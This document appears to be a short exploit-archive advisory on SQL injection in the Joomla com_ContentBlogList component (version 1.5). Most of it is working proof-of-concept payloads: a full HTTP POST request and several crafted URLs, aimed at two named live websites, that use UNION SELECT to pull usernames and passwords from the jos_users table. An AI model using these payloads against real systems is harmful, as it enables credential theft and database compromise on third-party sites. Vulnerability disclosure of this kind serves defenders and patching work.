The Joomla ContentBlogList component suffers from a remote SQL injection vulnerability.
ca684aa161b0de6be01d0eef6438a120538e6db6e5509b98afafb72da5ae23c6
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (com_ContentBlogList) SQL Injection Vulnerabilities
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: Demo Site and Official Site
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Multiple input vars are vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.5 but probably other versions also.
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> PROOF OF CONCEPT (DEMO SITE):
------------------------[BEGIN-SNIP{searchword var}]---------------------------------
POST http://www.kiddoagency.com/index.php/search.html HTTP/1.1
Host: www.kiddoagency.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: http://www.kiddoagency.com/index.php/search.html
Content-Type: application/x-www-form-urlencoded
Content-length: 276
searchword=Small%25%22%29%29+AND+0+UNION+ALL+SELECT+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30+FROM+jos_users%23&Search=Ir&task=listsearch&searchphrase=all&ordering=newest&
areas%5B%5D=content&Itemid=1§ionid=0&limitstart=
------------------------[END-SNIP{searchword var}]-----------------------------------
[~]>> PROOF OF CONCEPT (OFFICIAL SITE):
[~]>> AFFECTED VAR: id, section_id and more.
[~]>> http://www.percha.com/index.php?option=com_contentbloglist&task=listmonth&year=2010&month=1§ion_id=[SQL]&Itemid=1
[~]>> http://www.percha.com/index.php?option=com_contentbloglist&task=listmonth&year=2010&month=1§ion_id=999999+UNION+ALL+SELECT+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users&Itemid=1
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[END ADVISORY]...